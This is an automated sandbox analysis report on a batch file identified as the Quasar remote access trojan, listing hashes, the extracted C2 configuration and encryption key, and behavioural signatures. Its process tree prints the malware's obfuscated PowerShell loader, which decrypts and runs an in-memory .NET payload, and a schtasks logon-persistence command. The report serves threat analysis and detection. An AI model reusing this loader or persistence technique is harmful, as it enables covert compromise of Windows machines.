Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-06-2024 23:07
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240611-en
General
-
Target
Uni.bat
-
Size
253KB
-
MD5
6116316574a1311a2e768ef21255430d
-
SHA1
684dec7251dbacf3e3b5a3cac0492df268f7f9a3
-
SHA256
f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
-
SHA512
daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
-
SSDEEP
3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM
Malware Config
Extracted
quasar
3.0.1
Office04
wireless-boston.gl.at.ply.gg:41366
QSR_MUTEX_W1ckGYHOGswdBegmKd
-
encryption_key
QbY1WN4Surh1trMXzt97
-
install_name
system.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4792-19-0x000001D439E80000-0x000001D439EDE000-memory.dmp family_quasar -
Executes dropped EXE 2 IoCs
Processes:
Uni.bat.exesystem.exepid process 4792 Uni.bat.exe 1076 system.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 7 api.ipify.org -
Drops file in System32 directory 2 IoCs
Processes:
Uni.bat.exedescription ioc process File created C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe File opened for modification C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Uni.bat.exesystem.exepid process 4792 Uni.bat.exe 4792 Uni.bat.exe 1076 system.exe 1076 system.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Uni.bat.exesystem.exedescription pid process Token: SeDebugPrivilege 4792 Uni.bat.exe Token: SeDebugPrivilege 1076 system.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exenet.exeUni.bat.exedescription pid process target process PID 3324 wrote to memory of 3852 3324 cmd.exe net.exe PID 3324 wrote to memory of 3852 3324 cmd.exe net.exe PID 3852 wrote to memory of 3928 3852 net.exe net1.exe PID 3852 wrote to memory of 3928 3852 net.exe net1.exe PID 3324 wrote to memory of 4792 3324 cmd.exe Uni.bat.exe PID 3324 wrote to memory of 4792 3324 cmd.exe Uni.bat.exe PID 4792 wrote to memory of 1908 4792 Uni.bat.exe schtasks.exe PID 4792 wrote to memory of 1908 4792 Uni.bat.exe schtasks.exe PID 4792 wrote to memory of 1076 4792 Uni.bat.exe system.exe PID 4792 wrote to memory of 1076 4792 Uni.bat.exe system.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\SubDir\system.exe"C:\Windows\SysWOW64\SubDir\system.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcdy5t4z.kot.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1076-36-0x0000029E53A40000-0x0000029E53A86000-memory.dmpFilesize
280KB
-
memory/4792-16-0x00007FF8E5AD0000-0x00007FF8E6592000-memory.dmpFilesize
10.8MB
-
memory/4792-14-0x00007FF8E5AD0000-0x00007FF8E6592000-memory.dmpFilesize
10.8MB
-
memory/4792-15-0x00007FF8E5AD0000-0x00007FF8E6592000-memory.dmpFilesize
10.8MB
-
memory/4792-7-0x000001D439B80000-0x000001D439BA2000-memory.dmpFilesize
136KB
-
memory/4792-17-0x000001D439DF0000-0x000001D439E24000-memory.dmpFilesize
208KB
-
memory/4792-19-0x000001D439E80000-0x000001D439EDE000-memory.dmpFilesize
376KB
-
memory/4792-20-0x000001D43A640000-0x000001D43A652000-memory.dmpFilesize
72KB
-
memory/4792-21-0x00007FF8E5AD3000-0x00007FF8E5AD5000-memory.dmpFilesize
8KB
-
memory/4792-22-0x00007FF8E5AD0000-0x00007FF8E6592000-memory.dmpFilesize
10.8MB
-
memory/4792-4-0x00007FF8E5AD3000-0x00007FF8E5AD5000-memory.dmpFilesize
8KB
-
memory/4792-37-0x00007FF8E5AD0000-0x00007FF8E6592000-memory.dmpFilesize
10.8MB